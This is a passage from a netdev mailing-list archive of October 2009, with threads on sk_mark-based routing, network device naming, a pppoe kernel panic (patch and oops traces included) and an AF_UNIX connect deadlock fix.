that there is an argument for doing that. Although I still think that
setting the mark via the routing table would be a useful feature too.
> > 2. Look up a route on the tunnel itself (i.e. the tunnel endpoint not
> > the socket endpoint) using the mark from the initial lookup. This
> > route can depend on the previous lookup (if there are multiple
> > routes for multiple marks) and also set the mark to use.
>
> we would get the mark set by the tunneling module here.
>
> > The default would be to inherit the mark over a route lookup, in
> > case that no "setmark" had been specified for that route. In
> > other words, it would be the same as it is now.
>
> I'm not saying your solution wouldn't work, but I think it's less
> clean. I don't think marking should be inherited (in the general
> case) in case of packet wrapping (whether via gre, ipip, sit, or other
> methods).
>
I guess we could say that inheriting the mark would not be the default
if the packet has gone through a device (whether virtual or physical)
then. That still seems ok to me since its basically what happens currently
I think.
> > The mark is supposed to be a generic thing, not just for routing
> > lookups, it can be used for classification, etc as well. I would
> > expect to see such a thing used for maybe specifying a VLAN or
> > a reference to an MPLS label stack, or something similar too,
>
> Right, the mark can currently (as far as I know) be set in one of two
> ways - either from the mangle table (and it can also be matched on in
> netfilter) or by using setsockopt(SO_MARK).
>
> Imagine a situation where you have a machine with routing already
> configured (pretty complex setup, tunnels, firewalls, etc) and you
> want to run a user space application that verifies (health-checks)
> some remote host (or something). As part of the health check you want
> to verify a particular route to the destination. This requires
> per-socket routing, which can (almost) be achieved by having proper
> routing (on fwmark) setup and using setsockopt(SO_MARK) on the health
> check socket in order to force specific routing. These health checks
> may then of course be feedback into the routing system (ie. if they
> fail the routing rules get modified). Note, that in particular we may
> want to be healthchecking routes that aren't even available in the
> default routing table (because they've currently been removed from the
> default table, because previous health checks failed).
>
> Maciej
Yes, thats a good use case. I think there are a lot of other potential
use cases too though. A while back when I was looking into MPLS I wondered
about using the mark to index into a set of outgoing label stacks. That
was the original reason that I thought setting the mark via the routing
table would be useful. I've not really had the time to continue my
MPLS investigations recently though :(
Another potential use case would be to segregate traffic into different
routing domains (and thus being able to change the mark when moving from
one routing domain to another might be useful).
Steve.
^ permalink raw reply
* RE: PATCH: Network Device Naming mechanism and policy
From: Narendra_K @ 2009-10-19 11:30 UTC (permalink / raw)
To: dannf, bhutchings
Cc: netdev, linux-hotplug, Matt_Domsch, Jordan_Hargrave, Charles_Rose
In-Reply-To: <20091016214024.GA10091@ldl.fc.hp.com>
>> > > And how would the regular file look like in terms of holding
>> > > ifindex of the interface, which can be passed to libnetdevname.
>> >
>> > I can't think of anything we need to store in the regular file. If
>> > we have the kernel name for the device, we can look up the ifindex
>> > in /sys. Correct me if I'm wrong, but storing it ourselves seems
>> > redundant.
>>
>> But the name of a netdev can change whereas its ifindex never does.
>> Identifying netdevs by name would require additional work to update
>> the links when a netdev is renamed and would still be prone to race
>> conditions. This is why Narendra and Matt were proposing to
>store the
>> ifindex in the node all along...
>
>Matt, Ben and I talked about a few other possibilities on IRC.
>The one I like the most at the moment is an idea Ben had to
>creat dummy files named after the ifindex. Then, use symlinks
>for the kernel name and the various by-$property
>subdirectories. This means the KOBJ events will need to expose
>the ifindex.
>
I suppose the KOBJ events already expose the ifindex of a network
interface. The file "/sys/class/net/ethN/uevent" contains INTERFACE=ethN
and IFINDEX=n already. But it looks like udev doesn't use it in any way.
For example, with the kernel patch the "/sys/class/net/ethN/uevent"
contains in addition to the above details, MAJOR=M and MINOR=m which the
udev knows how to make use of with a rule like
SUBSYSTEM=="net", KERNEL!="tun", NAME="netdev/%k", MODE="0600".
>I'm a novice at net programming, but I'm told that ifindex is
>the information apps ultimately require here.
Yes. The minor number of the device node is retreived by libnetdevname
by "stat"ing the pathname which happens to be ifindex of the device and
it is mapped to corresponding kernel name by "if_indextoname" call.
With regards,
Narendra K
^ permalink raw reply
* Re: [PATCH] Add sk_mark route lookup support for IPv4 listening sockets, and for IPv4 multicast forwarding
From: Atis Elsts @ 2009-10-19 11:38 UTC (permalink / raw)
To: steve
Cc: Maciej Żenczykowski, David Miller, netdev, panther,
eric.dumazet, brian.haley
In-Reply-To: <20091019082033.GB27230@fogou.chygwyn.com>
On Monday 19 October 2009 11:20:33 steve@chygwyn.com wrote:
>
> Another potential use case would be to segregate traffic into different
> routing domains (and thus being able to change the mark when moving from
> one routing domain to another might be useful).
I agree. Actually, one of our users recenlty requested adding matcher in
firewall that would match outgoing the packets by the routing table that was
used to route them. (For now we found a workaround using tclassid, but that
requires manual configuration.) So yes, it's an useful feature even excluding
the tunnel cases.
I don't like the idea of using skb->mark for storing that information though,
because I think these multiple uses of the same field would be too confusing
for users, even if the default behavior remained the same as now. Also,
consider the case when someone watch to match packets in post routing chain
*both* by the mark that was set in prerouting chain, and routing table used
to route the packet?
There already is free space (padding fieds) in struct dst_entry, so why not
use this space to store the routing table? Speed is also not an issue,
because the field only needs to be filled in slowpath routing lookup, and
will be used only
1) if iptables are explicitly configured to match by it;
2) (?) in tunnel routing lookups. (no idea which is the best option here)
I see that struct rt6_info already has field
struct fib6_table *rt6i_table
so this matcher already can be made for IPv6 firewall. But IPv4 still is more
imporant at the moment :)
Atis
^ permalink raw reply
* Re: kernel panic in latest vanilla stable, while using nameif with "alive" pppoe interfaces
From: Denys Fedoryschenko @ 2009-10-19 11:36 UTC (permalink / raw)
To: Michal Ostrowski; +Cc: netdev, linux-ppp, paulus, mostrows
In-Reply-To: <e6d1cecd0910182034t9d24859mc6f392875b36ad17@mail.gmail.com>
Can you send me patch as attachment please?
On Monday 19 October 2009 06:34:06 Michal Ostrowski wrote:
> Here's my theory on this after an inital look...
>
> Looking at the oops report and disassembly of the actual module binary
> that caused the oops, one can deduce that:
>
> Execution was in pppoe_flush_dev(). %ebx contained the pointer "struct
> pppox_sock *po", which is what we faulted on, excuting "cmp %eax,
> 0x190(%ebx)". %ebx value was 0xffffffff (hence we got "NULL pointer
> dereference at 0x18f").
>
> At this point "i" (stored in %esi) is 15 (valid), meaning that we got a
> value of 0xffffffff in pn->hash_table[i].
>
> From this I'd hypothesize that the combination of dev_put() and
> release_sock() may have allowed us to free "pn". At the bottom of the loop
> we alreayd recognize that since locks are dropped we're responsible for
> handling invalidation of objects, and perhaps that should be extended to
> "pn" as well. --
> Michal Ostrowski
> mostrows@gmail.com
>
>
> ---
> drivers/net/pppoe.c | 86 ++++++++++++++++++++++++++----
> --------------------
> 1 files changed, 45 insertions(+), 41 deletions(-)
>
> diff --git a/drivers/net/pppoe.c b/drivers/net/pppoe.c
> index 7cbf6f9..720c4ea 100644
> --- a/drivers/net/pppoe.c
> +++ b/drivers/net/pppoe.c
> @@ -296,6 +296,7 @@ static void pppoe_flush_dev(struct net_device *dev)
>
> BUG_ON(dev == NULL);
>
> +restart:
> pn = pppoe_pernet(dev_net(dev));
> if (!pn) /* already freed */
> return;
> @@ -303,48 +304,51 @@ static void pppoe_flush_dev(struct net_device *dev)
> write_lock_bh(&pn->hash_lock);
> for (i = 0; i < PPPOE_HASH_SIZE; i++) {
> struct pppox_sock *po = pn->hash_table[i];
> + struct sock *sk;
>
> - while (po != NULL) {
> - struct sock *sk;
> - if (po->pppoe_dev != dev) {
> - po = po->next;
> - continue;
> - }
> - sk = sk_pppox(po);
> - spin_lock(&flush_lock);
> - po->pppoe_dev = NULL;
> - spin_unlock(&flush_lock);
> - dev_put(dev);
> -
> - /* We always grab the socket lock, followed by the
> - * hash_lock, in that order. Since we should
> - * hold the sock lock while doing any unbinding,
> - * we need to release the lock we're holding.
> - * Hold a reference to the sock so it doesn't
> disappear - * as we're jumping between locks.
> - */
> + while (po && po->pppoe_dev != dev) {
> + po = po->next;
> + }
>
> - sock_hold(sk);
> + if (po == NULL) {
> + continue;
> + }
>
> - write_unlock_bh(&pn->hash_lock);
> - lock_sock(sk);
> + sk = sk_pppox(po);
>
> - if (sk->sk_state & (PPPOX_CONNECTED | PPPOX_BOUND))
> { - pppox_unbind_sock(sk);
> - sk->sk_state = PPPOX_ZOMBIE;
> - sk->sk_state_change(sk);
> - }
> + spin_lock(&flush_lock);
> + po->pppoe_dev = NULL;
> + spin_unlock(&flush_lock);
>
> - release_sock(sk);
> - sock_put(sk);
> + dev_put(dev);
>
> - /* Restart scan at the beginning of this hash
> chain. - * While the lock was dropped the chain
> contents may - * have changed.
> - */
> - write_lock_bh(&pn->hash_lock);
> - po = pn->hash_table[i];
> - }
> + /* We always grab the socket lock, followed by the
> + * hash_lock, in that order. Since we should
> + * hold the sock lock while doing any unbinding,
> + * we need to release the lock we're holding.
> + * Hold a reference to the sock so it doesn't disappear
> + * as we're jumping between locks.
> + */
> +
> + sock_hold(sk);
> +
> + write_unlock_bh(&pn->hash_lock);
> + lock_sock(sk);
> +
> + if (sk->sk_state & (PPPOX_CONNECTED | PPPOX_BOUND)) {
> + pppox_unbind_sock(sk);
> + sk->sk_state = PPPOX_ZOMBIE;
> + sk->sk_state_change(sk);
> + }
> +
> + release_sock(sk);
> + sock_put(sk);
> +
> + /* Restart the flush process from the beginning. While
> + * the lock was dropped the chain contents may have
> + * changed, and sock_put may have made things go away.
> + */
> + goto restart;
> }
> write_unlock_bh(&pn->hash_lock);
> }
> --
> 1.6.3.3
>
> On Sun, Oct 18, 2009 at 4:02 PM, Denys Fedoryschenko <denys@visp.net.lb>
wrote:
> > I have server running as pppoe NAS.
> > Tried to rename customers without dropping pppd connections first, got
> > panic after few seconds.
> > Panic triggerable at 2.6.30.4 and 2.6.31.4
> > pppoe users running on eth2
> > pppoe flags:
> > 1457 root /usr/sbin/pppoe-server -I eth2 -k -L 172.16.1.1 -R
> > 172.16.1.2 -N 253 -C gpzone -S gpzone
> >
> >
> > Commands sequence that i think triggered that:
> >
> > ip link set eth0 down
> > ip link set eth1 down
> > ip link set eth2 down
> > nameif etherx 00:16:76:8D:83:BA
> > nameif eth0 00:19:e0:72:4a:37
> > nameif eth1 00:19:e0:72:4a:4b
> >
> > ip addr flush dev eth0
> > ip addr flush dev eth1
> > ip addr add X.X.X.X/29 dev eth0
> > ip addr add 192.168.2.177/24 dev eth0
> > ip addr add 192.168.0.1/32 dev eth1
> > ip addr add 127.0.0.0/8 dev lo
> > #ip link set eth0 up
> > ip link set eth0 up
> > ip link set eth1 up
> > ip link set lo up
> > ip route add 0.0.0.0/0 via X.X.X.X
> >
> >
> > [ 103.428591] r8169: eth0: link up
> > [ 103.430360] r8169: eth1: link up
> > [ 113.361528] BUG: unable to handle kernel
> > NULL pointer dereference
> > at 0000018f
> > [ 113.361717] IP:
> > [<f8868269>] pppoe_device_event+0x80/0x12c [pppoe]
> > [ 113.361853] *pdpt = 000000003411a001
> > *pde = 0000000000000000
> > Oct 18 23:59:40 194.146.153.93
> > [ 113.362012] Oops: 0000 [#1]
> > SMP
> > Oct 18 23:59:40 194.146.153.93
> > [ 113.362166] last sysfs file: /sys/devices/virtual/vc/vcs3/dev
> > [ 113.362246] Modules linked in:
> > netconsole
> > configfs
> > act_skbedit
> > sch_ingress
> > sch_prio
> > cls_flow
> > cls_u32
> > em_meta
> > cls_basic
> > xt_dscp
> > xt_DSCP
> > ipt_REJECT
> > ts_bm
> > xt_string
> > xt_hl
> > ifb
> > cls_fw
> > sch_tbf
> > sch_htb
> > act_ipt
> > act_mirred
> > xt_MARK
> > pppoe
> > pppox
> > ppp_generic
> > slhc
> > xt_TCPMSS
> > xt_mark
> > xt_tcpudp
> > iptable_mangle
> > iptable_nat
> > nf_nat
> > rtc_cmos
> > nf_conntrack_ipv4
> > rtc_core
> > nf_conntrack
> > rtc_lib
> > nf_defrag_ipv4
> > iptable_filter
> > ip_tables
> > x_tables
> > 8021q
> > garp
> > stp
> > llc
> > loop
> > sata_sil
> > pata_atiixp
> > pata_acpi
> > ata_generic
> > libata
> > 8139cp
> > usb_storage
> > mtdblock
> > mtd_blkdevs
> > mtd
> > sr_mod
> > cdrom
> > tulip
> > r8169
> > sky2
> > via_velocity
> > via_rhine
> > sis900
> > ne2k_pci
> > 8390
> > skge
> > tg3
> > libphy
> > 8139too
> > e1000
> > e100
> > usbhid
> > ohci_hcd
> > uhci_hcd
> > ehci_hcd
> > usbcore
> > nls_base
> > Oct 18 23:59:40 194.146.153.93
> > [ 113.362344]
> > [ 113.362344] Pid: 2858, comm: pppd Not tainted (2.6.31.4-build-0047 #7)
> > [ 113.362344] EIP: 0060:[<f8868269>] EFLAGS: 00010286 CPU: 0
> > [ 113.362344] EIP is at pppoe_device_event+0x80/0x12c [pppoe]
> > [ 113.362344] EAX: f4fbe000 EBX: ffffffff ECX: f6cea5a0 EDX: f7403680
> > [ 113.362344] ESI: 0000000f EDI: f6cea5e0 EBP: f4145e34 ESP: f4145e1c
> > [ 113.362344] DS: 007b ES: 007b FS: 00d8 GS: 0033 SS: 0068
> > [ 113.362344] Process pppd (pid: 2858, ti=f4145000 task=f4112ff0
> > task.ti=f4145000)
> > [ 113.362344] Stack:
> > [ 113.362344] f4fbe220
> > f4fbe000
> > f6cea5a0
> > f886a430
> > fffffff5
> > 00000000
> > f4145e54
> > c01422b3
> > Oct 18 23:59:40 194.146.153.93
> > [ 113.362344] <0>
> > f4fbe000
> > 00000009
> > f8a457d8
> > f4fbe000
> > f8850190
> > 00001091
> > f4145e64
> > c0142361
> > Oct 18 23:59:40 194.146.153.93
> > [ 113.362344] <0>
> > ffffffff
> > 00000000
> > f4145e74
> > c029ffbf
> > f4fbe000
> > 000010d0
> > f4145e90
> > c029fa70
> > Oct 18 23:59:40 194.146.153.93
> > [ 113.362344] Call Trace:
> > [ 113.362344] [<c01422b3>] ? notifier_call_chain+0x2b/0x4a
> > [ 113.362344] [<c0142361>] ? raw_notifier_call_chain+0xc/0xe
> > [ 113.362344] [<c029ffbf>] ? dev_close+0x4c/0x8c
> > [ 113.362344] [<c029fa70>] ? dev_change_flags+0xa5/0x158
> > [ 113.362344] [<c02da633>] ? devinet_ioctl+0x21a/0x503
> > [ 113.362344] [<c02db693>] ? inet_ioctl+0x8d/0xa6
> > [ 113.362344] [<c0292b21>] ? sock_ioctl+0x1c8/0x1ec
> > [ 113.362344] [<c0292959>] ? sock_ioctl+0x0/0x1ec
> > [ 113.362344] [<c019af2b>] ? vfs_ioctl+0x22/0x69
> > [ 113.362344] [<c019b435>] ? do_vfs_ioctl+0x41f/0x459
> > [ 113.362344] [<c02934eb>] ? sys_send+0x18/0x1a
> > [ 113.362344] [<c011942f>] ? do_page_fault+0x242/0x26f
> > [ 113.362344] [<c019b49b>] ? sys_ioctl+0x2c/0x45
> > [ 113.362344] [<c0102975>] ? syscall_call+0x7/0xb
> > [ 113.362344] Code:
> > c9
> > 00
> > 00
> > 00
> > 89
> > c7
> > 31
> > f6
> > 83
> > c7
> > 40
> > 89
> > f8
> > e8
> > cc
> > 60
> > a9
> > c7
> > 8b
> > 45
> > ec
> > 05
> > 20
> > 02
> > 00
> > 00
> > 89
> > 45
> > e8
> > 8b
> > 4d
> > f0
> > 8b
> > 1c
> > b1
> > e9
> > 8c
> > 00
> > 00
> > 00
> > 8b
> > 45
> > ec
> > Oct 18 23:59:40 194.146.153.93
> > 83
> > 90
> > 01
> > 00
> > 00
> > 74
> > 08
> > 8b
> > 9b
> > 8c
> > 01
> > 00
> > 00
> > eb
> > 79
> > b8
> > c0
> > a6
> > 86
> > f8
> > Oct 18 23:59:40 194.146.153.93
> > [ 113.362344] EIP: [<f8868269>]
> > pppoe_device_event+0x80/0x12c [pppoe]
> > SS:ESP 0068:f4145e1c
> > [ 113.362344] CR2: 000000000000018f
> > [ 113.373124] ---[ end trace f6fe64a307e97f3b ]---
> > [ 113.373203] Kernel panic - not syncing: Fatal exception in interrupt
> > [ 113.373286] Pid: 2858, comm: pppd Tainted: G D
> > 2.6.31.4-build-0047 #7
> > [ 113.373379] Call Trace:
> > [ 113.373479] [<c02fc496>] ? printk+0xf/0x11
> > [ 113.373561] [<c02fc3e7>] panic+0x39/0xd9
> > [ 113.373656] [<c01059b7>] oops_end+0x8b/0x9a
> > [ 113.373727] [<c0118f6d>] no_context+0x13d/0x147
> > [ 113.373800] [<c011908a>] __bad_area_nosemaphore+0x113/0x11b
> > [ 113.373881] [<c02953b3>] ? sock_alloc_send_pskb+0x8b/0x24a
> > [ 113.373959] [<c0121801>] ? __wake_up_sync_key+0x3b/0x45
> > [ 113.374030] [<c0131967>] ? irq_exit+0x39/0x5c
> > [ 113.374107] [<c0104393>] ? do_IRQ+0x80/0x96
> > [ 113.374183] [<c0102f49>] ? common_interrupt+0x29/0x30
> > [ 113.374259] [<c011909f>] bad_area_nosemaphore+0xd/0x10
> > [ 113.374348] [<c0119301>] do_page_fault+0x114/0x26f
> > [ 113.374526] [<c01191ed>] ? do_page_fault+0x0/0x26f
> > [ 113.374605] [<c02fe506>] error_code+0x66/0x6c
> > [ 113.374683] [<c02d007b>] ? tcp_v4_send_ack+0xa3/0x10e
> > [ 113.374764] [<c01191ed>] ? do_page_fault+0x0/0x26f
> > [ 113.374850] [<f8868269>] ? pppoe_device_event+0x80/0x12c [pppoe]
> > [ 113.374928] [<c01422b3>] notifier_call_chain+0x2b/0x4a
> > [ 113.375012] [<c0142361>] raw_notifier_call_chain+0xc/0xe
> > [ 113.375097] [<c029ffbf>] dev_close+0x4c/0x8c
> > [ 113.375169] [<c029fa70>] dev_change_flags+0xa5/0x158
> > [ 113.375239] [<c02da633>] devinet_ioctl+0x21a/0x503
> > [ 113.375318] [<c02db693>] inet_ioctl+0x8d/0xa6
> > [ 113.375411] [<c0292b21>] sock_ioctl+0x1c8/0x1ec
> > [ 113.375491] [<c0292959>] ? sock_ioctl+0x0/0x1ec
> > [ 113.375574] [<c019af2b>] vfs_ioctl+0x22/0x69
> > [ 113.375653] [<c019b435>] do_vfs_ioctl+0x41f/0x459
> > [ 113.375734] [<c02934eb>] ? sys_send+0x18/0x1a
> > [ 113.375813] [<c011942f>] ? do_page_fault+0x242/0x26f
> > [ 113.375884] [<c019b49b>] sys_ioctl+0x2c/0x45
> > [ 113.375960] [<c0102975>] syscall_call+0x7/0xb
> > [ 113.376041] Rebooting in 5 seconds..
^ permalink raw reply
* Re: [PATCH] AF_UNIX: Fix deadlock on connecting to shutdown socket
From: Jarek Poplawski @ 2009-10-19 11:57 UTC (permalink / raw)
To: Tomoki Sekiyama
Cc: linux-kernel, netdev, alan, davem, satoshi.oshima.fk,
hidehiro.kawai.ez, hideo.aoki.tk
In-Reply-To: <4ADC010C.5070809@hitachi.com>
On 19-10-2009 08:02, Tomoki Sekiyama wrote:
...
> Why this happens:
> Error checks between unix_socket_connect() and unix_wait_for_peer() are
> inconsistent. The former calls the latter to wait until the backlog is
> processed. Despite the latter returns without doing anything when the
> socket is shutdown, the former doesn't check the shutdown state and
> just retries calling the latter forever.
>
> Patch:
> The patch below adds shutdown check into unix_socket_connect(), so
> connect(2) to the shutdown socket will return -ECONREFUSED.
>
> Signed-off-by: Tomoki Sekiyama <tomoki.sekiyama.qu@hitachi.com>
> Signed-off-by: Masanori Yoshida <masanori.yoshida.tv@hitachi.com>
> ---
> net/unix/af_unix.c | 2 ++
> 1 files changed, 2 insertions(+), 0 deletions(-)
>
> diff --git a/net/unix/af_unix.c b/net/unix/af_unix.c
> index 51ab497..fc820cd 100644
> --- a/net/unix/af_unix.c
> +++ b/net/unix/af_unix.c
> @@ -1074,6 +1074,8 @@ restart:
> err = -ECONNREFUSED;
> if (other->sk_state != TCP_LISTEN)
> goto out_unlock;
> + if (other->sk_shutdown & RCV_SHUTDOWN)
> + goto out_unlock;
Isn't the shutdown call expected to change sk_state to TCP_CLOSE?
Jarek P.
^ permalink raw reply
* Re: kernel panic in latest vanilla stable, while using nameif with "alive" pppoe interfaces
From: Denys Fedoryschenko @ 2009-10-19 12:01 UTC (permalink / raw)
To: Michal Ostrowski; +Cc: netdev, linux-ppp, paulus, mostrows
In-Reply-To: <e6d1cecd0910182034t9d24859mc6f392875b36ad17@mail.gmail.com>
Applied patch manually, still panic (maybe different now):
[ 42.596904]
[ 42.596904] Pid: 0, comm: swapper Not tainted (2.6.31.4-build-0047 #12)
[ 42.596904] EIP: 0060:[<f886865e>] EFLAGS: 00010286 CPU: 0
[ 42.596904] EIP is at pppoe_rcv+0x153/0x1be [pppoe]
[ 42.596904] EAX: 00003100 EBX: ffffffff ECX: 00000002 EDX: f74007cb
[ 42.596904] ESI: f79b4b00 EDI: f6332f00 EBP: c1806edc ESP: c1806eb8
[ 42.596904] DS: 007b ES: 007b FS: 00d8 GS: 0000 SS: 0068
[ 42.596904] Process swapper (pid: 0, ti=c1806000 task=c03f6de0
task.ti=c03f1000)
[ 42.596904] Stack:
[ 42.596904] f7445000
00000004
f6fc0028
31000030
f6fc0030
f6332f40
f79b4b00
c0418140
Oct 19 15:00:46 194.146.153.99
[ 42.596904] <0>
f886a444
c1806f14
c029e702
f7445000
f79b4bb0
f79b4bb0
c0418160
f7445000
Oct 19 15:00:46 194.146.153.99
[ 42.596904] <0>
00000000
00000001
64886f14
c02ac3ce
f79b4b00
00000000
f753105c
c1806f58
Oct 19 15:00:46 194.146.153.99
[ 42.596904] Call Trace:
[ 42.596904] [<c029e702>] ? netif_receive_skb+0x43b/0x45a
[ 42.596904] [<c02ac3ce>] ? eth_type_trans+0x25/0xa9
[ 42.596904] [<f840f736>] ? rtl8169_rx_interrupt+0x343/0x3f3 [r8169]
[ 42.596904] [<f8412191>] ? rtl8169_poll+0x2f/0x1b2 [r8169]
[ 42.596904] [<c01413e5>] ? hrtimer_run_pending+0x2d/0xa7
[ 42.596904] [<c029ec95>] ? net_rx_action+0x93/0x177
[ 42.596904] [<c0131bdd>] ? __do_softirq+0xa7/0x144
[ 42.596904] [<c0131b36>] ? __do_softirq+0x0/0x144
[ 42.596904] <IRQ>
Oct 19 15:00:46 194.146.153.99
[ 42.596904] [<c0131957>] ? irq_exit+0x29/0x5c
[ 42.596904] [<c0104393>] ? do_IRQ+0x80/0x96
[ 42.596904] [<c0102f49>] ? common_interrupt+0x29/0x30
[ 42.596904] [<c0108a3e>] ? mwait_idle+0x8a/0xb9
[ 42.596904] [<c0149613>] ? tick_nohz_restart_sched_tick+0x27/0x12f
[ 42.596904] [<c0101bf0>] ? cpu_idle+0x44/0x60
[ 42.596904] [<c02ef8c7>] ? rest_init+0x53/0x55
[ 42.596904] [<c04197df>] ? start_kernel+0x2b9/0x2be
[ 42.596904] [<c041906a>] ? i386_start_kernel+0x6a/0x6f
[ 42.596904] Code:
53
0a
32
53
0b
31
c2
c1
e8
08
31
c2
eb
08
0f
b6
c2
c1
f8
04
31
c2
d1
e9
83
f9
04
74
f1
89
d0
83
e0
0f
8b
1c
87
eb
35
66
8b
45
ea
Oct 19 15:00:46 194.146.153.99
39
83
98
01
00
00
75
22
8b
55
e4
8d
83
9a
01
00
00
b9
06
00
Oct 19 15:00:46 194.146.153.99
[ 42.596904] EIP: [<f886865e>]
pppoe_rcv+0x153/0x1be [pppoe]
SS:ESP 0068:c1806eb8
[ 42.596904] CR2: 0000000000000197
[ 42.606148] ---[ end trace b477ff4ee072d9b9 ]---
[ 42.606209] Kernel panic - not syncing: Fatal exception in interrupt
[ 42.606273] Pid: 0, comm: swapper Tainted: G D 2.6.31.4-build-0047
#12
[ 42.606351] Call Trace:
[ 42.606413] [<c02fc496>] ? printk+0xf/0x11
[ 42.606474] [<c02fc3e7>] panic+0x39/0xd9
[ 42.606535] [<c01059b7>] oops_end+0x8b/0x9a
[ 42.606597] [<c0118f6d>] no_context+0x13d/0x147
[ 42.606658] [<c011908a>] __bad_area_nosemaphore+0x113/0x11b
[ 42.606722] [<c0121dc1>] ? check_preempt_wakeup+0x34/0x141
[ 42.606862] [<c01294bb>] ? try_to_wake_up+0x1aa/0x1b4
[ 42.606930] [<c0209541>] ? cpumask_next_and+0x26/0x37
[ 42.607003] [<c01256f5>] ? find_busiest_group+0x291/0x885
[ 42.607067] [<c019cf47>] ? pollwake+0x5a/0x63
[ 42.607127] [<c011909f>] bad_area_nosemaphore+0xd/0x10
[ 42.607189] [<c0119301>] do_page_fault+0x114/0x26f
[ 42.607251] [<c01191ed>] ? do_page_fault+0x0/0x26f
[ 42.607313] [<c02fe506>] error_code+0x66/0x6c
[ 42.607375] [<c02900d8>] ? pcibios_set_master+0x89/0x8d
[ 42.607436] [<c01191ed>] ? do_page_fault+0x0/0x26f
[ 42.607501] [<f886865e>] ? pppoe_rcv+0x153/0x1be [pppoe]
[ 42.607564] [<c029e702>] netif_receive_skb+0x43b/0x45a
[ 42.607625] [<c02ac3ce>] ? eth_type_trans+0x25/0xa9
[ 42.607691] [<f840f736>] rtl8169_rx_interrupt+0x343/0x3f3 [r8169]
[ 42.607759] [<f8412191>] rtl8169_poll+0x2f/0x1b2 [r8169]
[ 42.607824] [<c01413e5>] ? hrtimer_run_pending+0x2d/0xa7
[ 42.607886] [<c029ec95>] net_rx_action+0x93/0x177
[ 42.607948] [<c0131bdd>] __do_softirq+0xa7/0x144
[ 42.608022] [<c0131b36>] ? __do_softirq+0x0/0x144
[ 42.608082] <IRQ>
[<c0131957>] ? irq_exit+0x29/0x5c
[ 42.608183] [<c0104393>] ? do_IRQ+0x80/0x96
[ 42.608183] [<c0104393>] ? do_IRQ+0x80/0x96
[ 42.608245] [<c0102f49>] ? common_interrupt+0x29/0x30
[ 42.608307] [<c0108a3e>] ? mwait_idle+0x8a/0xb9
[ 42.608369] [<c0149613>] ? tick_nohz_restart_sched_tick+0x27/0x12f
[ 42.608431] [<c0101bf0>] ? cpu_idle+0x44/0x60
[ 42.608493] [<c02ef8c7>] ? rest_init+0x53/0x55
[ 42.608553] [<c04197df>] ? start_kernel+0x2b9/0x2be
[ 42.608616] [<c041906a>] ? i386_start_kernel+0x6a/0x6f
[ 42.608682] Rebooting in 5 seconds..
On Monday 19 October 2009 06:34:06 Michal Ostrowski wrote:
> Here's my theory on this after an inital look...
>
> Looking at the oops report and disassembly of the actual module binary
> that caused the oops, one can deduce that:
>
> Execution was in pppoe_flush_dev(). %ebx contained the pointer "struct
> pppox_sock *po", which is what we faulted on, excuting "cmp %eax,
> 0x190(%ebx)". %ebx value was 0xffffffff (hence we got "NULL pointer
> dereference at 0x18f").
>
> At this point "i" (stored in %esi) is 15 (valid), meaning that we got a
> value of 0xffffffff in pn->hash_table[i].
>
> From this I'd hypothesize that the combination of dev_put() and
> release_sock() may have allowed us to free "pn". At the bottom of the loop
> we alreayd recognize that since locks are dropped we're responsible for
> handling invalidation of objects, and perhaps that should be extended to
> "pn" as well. --
> Michal Ostrowski
> mostrows@gmail.com
>
>
> ---
> drivers/net/pppoe.c | 86 ++++++++++++++++++++++++++----
> --------------------
> 1 files changed, 45 insertions(+), 41 deletions(-)
>
> diff --git a/drivers/net/pppoe.c b/drivers/net/pppoe.c
> index 7cbf6f9..720c4ea 100644
> --- a/drivers/net/pppoe.c
> +++ b/drivers/net/pppoe.c
> @@ -296,6 +296,7 @@ static void pppoe_flush_dev(struct net_device *dev)
>
> BUG_ON(dev == NULL);
>
> +restart:
> pn = pppoe_pernet(dev_net(dev));
> if (!pn) /* already freed */
> return;
> @@ -303,48 +304,51 @@ static void pppoe_flush_dev(struct net_device *dev)
> write_lock_bh(&pn->hash_lock);
> for (i = 0; i < PPPOE_HASH_SIZE; i++) {
> struct pppox_sock *po = pn->hash_table[i];
> + struct sock *sk;
>
> - while (po != NULL) {
> - struct sock *sk;
> - if (po->pppoe_dev != dev) {
> - po = po->next;
> - continue;
> - }
> - sk = sk_pppox(po);
> - spin_lock(&flush_lock);
> - po->pppoe_dev = NULL;
> - spin_unlock(&flush_lock);
> - dev_put(dev);
> -
> - /* We always grab the socket lock, followed by the
> - * hash_lock, in that order. Since we should
> - * hold the sock lock while doing any unbinding,
> - * we need to release the lock we're holding.
> - * Hold a reference to the sock so it doesn't
> disappear - * as we're jumping between locks.
> - */
> + while (po && po->pppoe_dev != dev) {
> + po = po->next;
> + }
>
> - sock_hold(sk);
> + if (po == NULL) {
> + continue;
> + }
>
> - write_unlock_bh(&pn->hash_lock);
> - lock_sock(sk);
> + sk = sk_pppox(po);
>
> - if (sk->sk_state & (PPPOX_CONNECTED | PPPOX_BOUND))
> { - pppox_unbind_sock(sk);
> - sk->sk_state = PPPOX_ZOMBIE;
> - sk->sk_state_change(sk);
> - }
> + spin_lock(&flush_lock);
> + po->pppoe_dev = NULL;
> + spin_unlock(&flush_lock);
>
> - release_sock(sk);
> - sock_put(sk);
> + dev_put(dev);
>
> - /* Restart scan at the beginning of this hash
> chain. - * While the lock was dropped the chain
> contents may - * have changed.
> - */
> - write_lock_bh(&pn->hash_lock);
> - po = pn->hash_table[i];
> - }
> + /* We always grab the socket lock, followed by the
> + * hash_lock, in that order. Since we should
> + * hold the sock lock while doing any unbinding,
> + * we need to release the lock we're holding.
> + * Hold a reference to the sock so it doesn't disappear
> + * as we're jumping between locks.
> + */
> +
> + sock_hold(sk);
> +
> + write_unlock_bh(&pn->hash_lock);
> + lock_sock(sk);
> +
> + if (sk->sk_state & (PPPOX_CONNECTED | PPPOX_BOUND)) {
> + pppox_unbind_sock(sk);
> + sk->sk_state = PPPOX_ZOMBIE;
> + sk->sk_state_change(sk);
> + }
> +
> + release_sock(sk);
> + sock_put(sk);
> +
> + /* Restart the flush process from the beginning. While
> + * the lock was dropped the chain contents may have
> + * changed, and sock_put may have made things go away.
> + */
> + goto restart;
> }
> write_unlock_bh(&pn->hash_lock);
> }
> --
> 1.6.3.3
>
> On Sun, Oct 18, 2009 at 4:02 PM, Denys Fedoryschenko <denys@visp.net.lb>
wrote:
> > I have server running as pppoe NAS.
> > Tried to rename customers without dropping pppd connections first, got
> > panic after few seconds.
> > Panic triggerable at 2.6.30.4 and 2.6.31.4
> > pppoe users running on eth2
> > pppoe flags:
> > 1457 root /usr/sbin/pppoe-server -I eth2 -k -L 172.16.1.1 -R
> > 172.16.1.2 -N 253 -C gpzone -S gpzone
> >
> >
